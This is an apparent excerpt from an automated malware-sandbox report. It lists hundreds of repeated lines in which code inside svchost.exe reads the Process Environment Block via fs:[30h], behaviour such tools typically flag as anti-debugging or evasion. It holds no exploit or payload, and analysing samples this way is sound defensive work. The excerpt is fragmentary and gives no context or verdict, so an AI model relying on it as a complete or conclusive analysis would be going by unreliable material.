                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]2_2_02F2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]2_2_02F2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]2_2_02F36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h]2_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h]2_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]2_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]2_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]2_2_02F2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]2_2_02F663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]2_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]2_2_02FEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]2_2_02FB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300625D mov eax, dword ptr fs:[00000030h]2_2_0300625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]2_2_02FD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]2_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]2_2_02FD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030062D6 mov eax, dword ptr fs:[00000030h]2_2_030062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F280A0 mov eax, dword ptr fs:[00000030h]2_2_02F280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
